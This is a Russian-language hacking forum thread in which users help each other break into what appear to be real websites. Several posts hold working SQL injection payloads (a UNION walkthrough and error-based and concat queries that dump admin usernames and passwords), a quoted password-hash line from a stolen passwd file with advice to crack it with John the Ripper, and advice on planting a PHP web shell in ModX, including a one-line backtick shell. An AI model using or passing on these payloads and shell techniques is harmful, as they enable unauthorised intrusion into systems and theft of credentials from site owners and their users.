Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    237
    Likes Received:
    155
    Reputations:
    0
    Можете показать payload на моем примере?Спасибо
     
  2. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
    asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6MajoyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:[email protected]:/home/asd.s1:/bin/bash
    Как я понимаю зашифрован пароль или я ошибаюсь?
    Заранее спасибо за ответ.
     
  3. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    2winstrool, спасибо! запрос сработал без заминок:), единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать:cool:.
     
  4. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Для начала перебираешь кол-во колонок, следующим образом:
    frontend=79e4b338bee15a3d6ed248041302800c order by 1#
    Если отображает товары, значит запрос прошел, идем дальше.
    frontend=79e4b338bee15a3d6ed248041302800c order by 5#
    Если отображает товары, идем дальше
    frontend=79e4b338bee15a3d6ed248041302800c order by 6#
    Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть).

    Если мы определили кол-во колонок, делаем следующее:
    frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7))
    Если все верно, то ошибки быть не должно, товары в корзине должны отображаться.

    И далее:
    frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5--

    Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было.

    Если есть, то это обычная инъекция, материала на эту тему много.

    Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно.


    Да ты прав, он зашифрован. Говорят программа John The Ripper с этим может справиться.


    Успехов!)
     
    #1024 ArmusIAm, 18 Jan 2016
    Last edited: 18 Jan 2016
    ol1ver and sysjuk like this.
  5. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Ниче не помогло
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    https://forum.antichat.ru/threads/43966/ -
    SQL injection полный FAQ
     
    _________________________
    Found likes this.
  7. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Бро, ты конечно извини, но я не экстрасенс и не врач. Хочешь чтобы тебе помогли, описывай сложности как можно подробнее
     
  8. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    спс, разобрался вроде) делаю финальный запрос:

    (select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)

    в ответ тишина:eek:, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...
     
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin
     
    _________________________
    Found likes this.
  10. kao

    kao New Member

    Joined:
    19 Jan 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Да пароль SHA512(Unix) https://en.wikipedia.org/wiki/Passwd#Shadow_file
     
    _________________________
    sysjuk likes this.
  12. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    наз
    название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?

    делаю такой, но он судя по всему неправильный:oops::
    ?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --+
    подскажите как задать правильный запрос на проверку записей в полях таблицы?:cool:
    также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))
     
  13. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    ?id=-613+union+select+1,COUNT(login,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM admin--+
    Если все правильно понял.
     
  14. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ребят помогите пожалуйста
    Считается это уязвимостью ?
    Я отправил пост запрос с таким кодом
    &categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
    и выдало это
    [​IMG]
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  16. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
    BabaDook and Found like this.
  17. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Нет, обычный массив данных. Могу предположить передается яваскриптом при отправке формы.
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  19. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:

    This directory is empty.Directories: 0
    Files: 0
    Data: 0 B
    Directory writable? No.

    Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....

    + Есть возможность добавить пхп код в модуль, я пробовал добавлять <?=@`$c`?>, но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?
     
    #1039 PulsarEX547, 21 Jan 2016
    Last edited: 21 Jan 2016
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай